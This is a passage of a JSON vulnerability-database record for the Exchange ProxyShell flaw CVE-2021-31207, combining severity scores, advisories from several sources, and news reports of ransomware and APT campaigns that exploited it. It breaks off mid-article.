{"prion": [{"lastseen": "2023-08-16T04:52:18", "description": "Microsoft Exchange Server Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T19:15:00", "type": "prion", "title": "CVE-2021-31207", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-31207", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-31207", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:30:25", "description": "An authentication bypass vulnerability exists in Microsoft Exchange Server. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.2, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-16T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Security Feature Authentication Bypass (CVE-2021-31207)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207"], "modified": "2021-12-16T00:00:00", "id": "CPAI-2021-0900", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-08-06T20:18:17", "description": "Microsoft Exchange Server contains an unspecified vulnerability that allows for security feature bypass.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Security Feature Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-31207", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-08-06T19:02:44", "description": "Microsoft Exchange Server Security Feature Bypass Vulnerability", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T19:15:00", "type": "cve", "title": "CVE-2021-31207", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207"], "modified": "2023-08-02T00:15:00", "cpe": ["cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019", "cpe:/a:microsoft:exchange_server:2016"], "id": "CVE-2021-31207", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31207", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-08-07T00:17:35", "description": "Microsoft Exchange Server Security Feature Bypass Vulnerability\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-31207", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207"], "modified": "2023-08-02T00:00:00", "id": "AKB:5E706DDA-98EC-49CA-AB21-4814DAF26444", "href": "https://attackerkb.com/topics/5F0CGZWw61/cve-2021-31207", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-07T00:04:03", "description": "ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2023-08-06T22:07:10", "description": "This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft Exchange Server. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of mailbox export. The issue results from the lack of proper validation of user-supplied data, which can allow the upload of arbitrary files. An attacker can leverage this vulnerability to execute arbitrary code in the context of SYSTEM.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Exchange Server Arbitrary File Write Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207"], "modified": "2021-07-19T00:00:00", "id": "ZDI-21-819", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-819/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgG4LpJKxqUO2-qxnPcHk7kZshWlpcUJf4apWnuuu8g9A2r0wcvybcwpf7lOoNA63j4bRBhFvjSOcGs6VNIFsmjXTIplZEkjAFtBn3cM6NGJ0rIS2GGGAKNgL2WQIm_-fjXlryklUzygBckkBMBoeHlXhheLR9onLzGHVYPSgJnrJE7GbCsqTLo57hD/s728-e100/hive-ransomware.jpg>)\n\nA recent Hive ransomware attack carried out by an affiliate involved the exploitation of \"ProxyShell\" vulnerabilities in the Microsoft Exchange Server that were disclosed last year to encrypt an unnamed customer's network.\n\n\"The actor managed to achieve its malicious goals and encrypt the environment in less than 72 hours from the initial compromise,\" Varonis security researcher, Nadav Ovadia, [said](<https://www.varonis.com/blog/hive-ransomware-analysis>) in a post-mortem analysis of the incident. \n\nHive, which was [first observed](<https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html>) in June 2021, follows the lucrative ransomware-as-a-service (RaaS) scheme adopted by other cybercriminal groups in recent years, enabling affiliates to deploy the file-encrypting malware after gaining a foothold into their victims' networks.\n\n[ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) \u2014 tracked as CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473 \u2014 involves a combination of security feature bypass, privilege escalation, and remote code execution in the Microsoft Exchange Server, effectively granting the attacker the ability to execute arbitrary code on affected servers.\n\nThe issues were addressed by Microsoft as part of its Patch Tuesday updates for April and May 2021.\n\nIn this case, successful exploitation of the flaws allowed the adversary to deploy web shells on the compromised server, using them to run malicious PowerShell code with SYSTEM privileges to create a new backdoor administrator user, hijack the domain admin account, and perform lateral movement.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEgbU5YaGjiHhZvFPL5Fqh7rHbVldX6X-unk-Mq6dP0icasfzkogYQnkRDy9ZUNWr3oca2oh6FGdjSzMm5uyXe1DLzwsty4H8hXGZia0azIu3Q24ZyBwemMQXMvu5dpzZQn-9MUl_WWAG5opQBaoXlyg6Esg2eBVWtdYcBrz5l7yZPDtCD1v9nzKF-D8/s728-e100/hive.jpg>)\n\nThe web shells used in the attack are said to have been sourced from a [public git repository](<https://github.com/ThePacketBender/webshells>) and given filenames containing a random mix of characters to evade detection, Ovadia said. Also executed was an additional obfuscated PowerShell script that's part of the Cobalt Strike framework.\n\nFrom there, the threat actor moved to scan the network for valuable files, before proceeding to deploy the Golang ransomware executable (named \"Windows.exe\") to complete the encryption process and display the ransom note to the victim.\n\nOther operations carried out by the malware include deleting shadow copies, turning off security products, and clearing Windows event logs to avoid detection, prevent recovery, and ensure that the encryption happens without any hiccup.\n\nIf anything, the findings are yet another indicator that patching for known vulnerabilities is key to thwarting cyberattacks and other nefarious activities.\n\n\"Ransomware attacks have grown significantly over the past years and remain the preferred method of threat actors aiming to maximize profits,\" Ovadia said. \"It may potentially harm an organization's reputation, disrupt regular operations and lead to temporary, and possibly permanent, loss of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-21T10:00:00", "type": "thn", "title": "New Incident Report Reveals How Hive Ransomware Targets Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-04-21T10:00:58", "id": "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "href": "https://thehackernews.com/2022/04/new-incident-report-reveals-how-hive.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEihM5iYK8V59Az6V_QU4QfgIeRF_0hGVdMPzkolUAVIW-fNuFPicRQP8GVCKVzA_FETzCTUZXWBI67kH6LRZTLGCO5eI9UumwAso17F_kIigeX8Y7Z41AMwAPgq1iysoZkTTX-VU5eO4nCRvjFq57tq6FcnFZd3DBb3A8kWOZ253GJWm-fH0WFE7Fna>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of \"**ProxyShell**\" Microsoft Exchange vulnerabilities that were patched earlier this May, including deploying LockFile ransomware on compromised systems.\n\nTracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates.\n\n\"An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine,\" CISA [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>).\n\nThe development comes a little over a week after cybersecurity researchers sounded the alarm on [opportunistic scanning and exploitation](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) of unpatched Exchange servers by taking advantage of the ProxyShell attack chain.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi9pcvxkZCqcBcriArdPtNn0AWuIafJEeUPlEHsu4z-oKwZf3gzsprTbCyyBAmMBzU-gFoDqTD8zWP4vrlEdDv_w5I3I5iSFyAS8RZ2p_jjRO0sOXbKoN31TMsPPfb0BXXZt8m7aM2SAtTFrkZ3hdSN1FSLaynBoGiYDkl78s_i0T5Kva4eudH21Jzf>) \n--- \nImage Source: [Huntress Labs](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) \n \nOriginally demonstrated at the [Pwn2Own hacking contest](<https://thehackernews.com/2021/04/windows-ubuntu-zoom-safari-ms-exchange.html>) in April this year, ProxyShell is part of a broader trio of exploit chains discovered by DEVCORE security researcher Orange Tsai that includes ProxyLogon and ProxyOracle, the latter of which concerns two remote code execution flaws that could be employed to recover a user's password in plaintext format.\n\n\"They're backdooring boxes with webshells that drop other webshells and also executables that periodically call out,\" researcher Kevin Beaumont [noted](<https://twitter.com/GossiTheDog/status/1425844380376735746>) last week.\n\nNow according to researchers from Huntress Labs, at least [five distinct styles of web shells](<https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit>) have been observed as deployed to vulnerable Microsoft Exchange servers, with over over 100 incidents reported related to the exploit between August 17 and 18. Web shells grant the attackers remote access to the compromised servers, but it isn't clear exactly what the goals are or the extent to which all the flaws were used.\n\nMore than 140 web shells have been detected across no fewer than 1,900 unpatched Exchanger servers to date, Huntress Labs CEO Kyle Hanslovan [tweeted](<https://twitter.com/KyleHanslovan/status/1428804893423382532>), adding \"impacted [organizations] thus far include building manufacturing, seafood processors, industrial machinery, auto repair shops, a small residential airport and more.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-22T09:51:00", "type": "thn", "title": "WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:28:25", "id": "THN:5BE77895D84D1FB816C73BB1661CE8EB", "href": "https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiQk7skJEo49QfN4ESusan9jBZfTXapDKpnR6CXuJbaNKUBpx7nO684Vj5RRctI8hh09KwyntDYPyeQI-HbWC03E5Uo4ABDXXj3vfb774Dv1G65e03iX30VM0pcCe5hQfxnkW-u1V4gZgZ3L2et_QXqceUwFJfPQDg8aUOWSagSt-l0OGRquNTiLEso>)\n\nA previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.\n\nCybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang \u2014 referring to their chameleellonic capabilities, including disguising \"its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.\" \n\n\"To achieve their goal, the attackers used a trending penetration method\u2014supply chain,\" the researchers [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-uncovers-new-apt-group-attacking-russia-s-fuel-and-energy-complex-and-aviation-production-industry/>) of one of the incidents investigated by the firm. \"The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method [\u2026], the ChamelGang group was able to achieve its goal and steal data from the compromised network.\"\n\nIntrusions mounted by the adversary are believed to have commenced at the end of March 2021, with later attacks in August leveraging what's called the [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) chain of vulnerabilities affecting Microsoft Exchange Servers, the technical details of which were first revealed at the Black Hat USA 2021 security conference earlier that month.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgpU90FEVyvHUv6m3vUITmIj4tJ_Kexp6cw5No4dV8_Po339DpYJtWa0Z-_BTv7hBE9_EkkSjRVlbP2lsM6MxD-x1p1yD_mQOhRoeiBy9vjPZXWBKrrJlJlvEbl4QdL8woMTd4XIY2ZGusd5N0uFaCwXBUiwFnJnXGfU0C-ESawdO8FR9OB4njoQ6oc>)\n\nThe attack in March is also notable for the fact that the operators breached a subsidiary organization to gain access to an unnamed energy company's network by exploiting a flaw in Red Hat JBoss Enterprise Application ([CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>)) to remotely execute commands on the host and deploy malicious payloads that enable the actor to launch the malware with elevated privileges, laterally pivot across the network, and perform reconnaissance, before deploying a backdoor called DoorMe.\n\n\"The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang,\" the researchers said. \"This utility allows connecting to a reverse proxy server. The attackers' requests were routed using the socks5 plugin through the server address obtained from the configuration data.\"\n\nOn the other hand, the August attack against a Russian company in the aviation production sector involved the exploitation of ProxyShell flaws (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to drop additional web shells and conduct remote reconnaissance on the compromised node, ultimately leading to the installation of a modified version of the DoorMe implant that comes with expanded capabilities to run arbitrary commands and carry out file operations.\n\n\"Targeting the fuel and energy complex and aviation industry in Russia isn't unique \u2014 this sector is one of the three most frequently attacked,\" Positive Technologies' Head of Threat Analysis, Denis Kuvshinov, said. \"However, the consequences are serious: Most often such attacks lead to financial or data loss\u2014in 84% of all cases last year, the attacks were specifically created to steal data, and that causes major financial and reputational damage.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T12:48:00", "type": "thn", "title": "A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-04T12:48:16", "id": "THN:E95B6A75073DA71CEC73B2E4F0B13622", "href": "https://thehackernews.com/2021/10/a-new-apt-hacking-group-targeting-fuel.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-04T12:04:40", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6538WifO-pQPlUhACBuUX_jTbrSpW305DDSQv2XtGhWolinz3L4Hgy3yckiql7NJG9L9tFcb9ZFIPr1a1yBf9bvlyuXOAhhxdrgegxaIMeSIxRzX7JFkUbAULNHo8UzppH76EuY77JOotsyc1FYph-TCqk5DAr4GPj--2TvKuoLT8Tucw6ssJeCOa/s728-e100/proxynotshell.jpg>)\n\nNicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082 that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers.\n\nBased on ProxyShell, this new zero-day abuse risk leverage a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 \u2013 to permit a remote actor to execute arbitrary code.\n\nDespite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities.\n\n## Meet ProxyNotShell \n\nRecorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable an authenticated attacker to compromise the underlying exchange server by leveraging existing exchange PowerShell, which could result in a full compromise.\n\nWith the help of CVE-2022-41040, another Microsoft vulnerability also recorded on September 19, 2022, an attacker can remotely trigger CVE-2022-41082 to remotely execute commands.\n\nThough a user needs to have the privilege to access CVE-2022-41040, which should curtail the vulnerability accessibility to attackers, the required level of privilege is low.\n\nAt the time of writing, Microsoft has not yet issued a patch but recommends that users [add a blocking rule](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as a mitigation measure.\n\nBoth vulnerabilities were uncovered during an active attack against GTSC, a Vietnamese organization called GTSC, granting attackers access to some of their clients. Though neither vulnerability on its own is particularly dangerous, exploits chaining them together could potentially lead to catastrophic breaches.\n\nThe chained 